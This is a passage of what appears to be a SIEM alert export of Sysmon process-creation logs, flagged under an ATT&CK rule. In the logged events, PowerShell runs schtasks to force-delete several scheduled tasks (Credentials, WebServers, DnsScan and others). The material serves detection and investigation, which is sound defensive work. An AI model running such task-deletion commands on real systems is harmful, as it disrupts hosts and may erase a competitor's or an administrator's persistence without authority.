Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:05.015",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:34.572 +ProcessGuid: {df9fc3d3-b3d6-5ecf-0000-0010d8012c00} +ProcessId: 3816 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Credentials /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Credentials /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:34.577354600Z"",""eventRecordID"":""3333"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:34.572\r\nProcessGuid: {df9fc3d3-b3d6-5ecf-0000-0010d8012c00}\r\nProcessId: 3816\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Credentials /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:34.572"",""processGuid"":""{df9fc3d3-b3d6-5ecf-0000-0010d8012c00}"",""processId"":""3816"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Credentials /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:04.999",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:34.549 +ProcessGuid: {df9fc3d3-b3d6-5ecf-0000-00109cff2b00} +ProcessId: 7332 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN WebServers /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN WebServers /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:34.552524100Z"",""eventRecordID"":""3332"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:34.549\r\nProcessGuid: {df9fc3d3-b3d6-5ecf-0000-00109cff2b00}\r\nProcessId: 7332\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN WebServers /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:34.549"",""processGuid"":""{df9fc3d3-b3d6-5ecf-0000-00109cff2b00}"",""processId"":""7332"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN WebServers /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:04.985",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:34.523 +ProcessGuid: {df9fc3d3-b3d6-5ecf-0000-00107afd2b00} +ProcessId: 4312 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN DnsScan /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN DnsScan /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:34.525472300Z"",""eventRecordID"":""3331"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:34.523\r\nProcessGuid: {df9fc3d3-b3d6-5ecf-0000-00107afd2b00}\r\nProcessId: 4312\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN DnsScan /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:34.523"",""processGuid"":""{df9fc3d3-b3d6-5ecf-0000-00107afd2b00}"",""processId"":""4312"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN DnsScan /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:04.951",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:34.501 +ProcessGuid: {df9fc3d3-b3d6-5ecf-0000-00107efb2b00} +ProcessId: 3048 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Ddrivers /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Ddrivers /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:34.503261200Z"",""eventRecordID"":""3330"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:34.501\r\nProcessGuid: {df9fc3d3-b3d6-5ecf-0000-00107efb2b00}\r\nProcessId: 3048\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Ddrivers /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:34.501"",""processGuid"":""{df9fc3d3-b3d6-5ecf-0000-00107efb2b00}"",""processId"":""3048"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Ddrivers /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:04.936",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:34.470 +ProcessGuid: {df9fc3d3-b3d6-5ecf-0000-0010b1f92b00} +ProcessId: 984 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Bluetooths /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Bluetooths /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:34.473310000Z"",""eventRecordID"":""3329"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:34.470\r\nProcessGuid: {df9fc3d3-b3d6-5ecf-0000-0010b1f92b00}\r\nProcessId: 984\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Bluetooths /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:34.470"",""processGuid"":""{df9fc3d3-b3d6-5ecf-0000-0010b1f92b00}"",""processId"":""984"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Bluetooths /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:04.931",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:34.437 +ProcessGuid: {df9fc3d3-b3d6-5ecf-0000-0010aef62b00} +ProcessId: 5396 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN WwANsvc /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN WwANsvc /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:34.442676900Z"",""eventRecordID"":""3328"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:34.437\r\nProcessGuid: {df9fc3d3-b3d6-5ecf-0000-0010aef62b00}\r\nProcessId: 5396\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN WwANsvc /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:34.437"",""processGuid"":""{df9fc3d3-b3d6-5ecf-0000-0010aef62b00}"",""processId"":""5396"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN WwANsvc /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 